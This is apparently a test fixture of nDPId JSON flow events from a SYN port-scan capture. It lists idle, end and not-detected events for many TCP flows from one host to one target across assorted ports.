-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2638,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":593,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":593,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1019,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1019,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16993,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1086,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1086,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16993,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":617,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275058031,"flow_last_seen":1278275058093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31337,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275058031,"flow_last_seen":1278275058093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":617,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":625,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":625,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":631,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":631,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6779,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":636,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6779,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 